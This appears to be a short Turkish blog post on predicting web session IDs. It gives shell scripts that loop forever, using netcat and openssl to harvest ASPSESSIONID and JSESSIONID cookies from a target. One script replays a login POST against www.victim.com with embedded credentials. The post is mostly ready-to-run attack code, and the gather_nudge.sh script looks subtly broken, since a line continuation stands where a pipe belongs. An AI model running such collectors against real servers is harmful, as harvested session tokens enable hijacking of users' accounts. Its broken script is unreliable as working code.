Automated Prediction
Bu bölüm, tahmin edilebilir session ID'ler ve kriptolanmış veriler üzerinde otomatize analizler yapma teknikleri içerir.Collecting Samples
Session ID'lerin gerçekten ne kadar rastgele olduğunu anlamak için yeteri miktar örnek sessionID toplamak gerekir. Aşağıdaki scriptler, sonsuz döngülüdür, yeterince bilgi toplandığı düşünüldüğünde kesilmelidir.Gather.sh: netcat kullanarak HTTP sunucudan ASPSESSIONID bilgilerini toplar:
#!/bin/sh
# gather.sh
while [ 1 ]
do
echo -e "GET / HTTP/1.0\n\n" | \
nc -vv $1 80 | \
grep ASPSESSIONID
doneGather_ssl.sh: openssl kullanarak HTTPS sunucudan JSESSIONID bilgilerini toplar:
#!/bin/sh
# gather_ssl.sh
while [ 1 ]
do
echo -e "GET / HTTP/1.0\n\n" | \
openssl s_client -quiet -no_tls1 -connect $1:443 2>/dev/null | \
grep JSESSIONID
done
Gather_nudge.sh: Bir üsttekine ilaveten sunucu cookie'yi set etmeden önce belirli bir login talebi POST eder (nudge dosyasına dikkat):#!/bin/sh
# gather_nudge.sh
while [ 1 ]
do
cat nudge \
openssl s_client -quiet -no_tls1 -connect $1:443 2>/dev/null | \
grep JSESSIONID
done
Bu scriptte referans edilen "nudge" dosyasının içeriği:POST /secure/client.asp?id=9898 HTTP/1.1
Accept: */*Content-Type: text/xml
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Q312461)
Host: www.victim.com
Content-Length: 102
Connection: Keep-Alive
Cache-Control: no-cache
<LoginRequest><User><SignInName>latour</SignInName><Password>Eiffel
</Password></User></LoginRequest>
Scriptlerin kullanılış örnekleri:
$ ./gather.sh www.victim.com | tee cookies.txt
$ ./gather_ssl.sh www.victim.com | tee cookies.txt
$ ./gather_nudge.sh www.victim.com | tee cookies.txt
Hiç yorum yok:
Yorum Gönder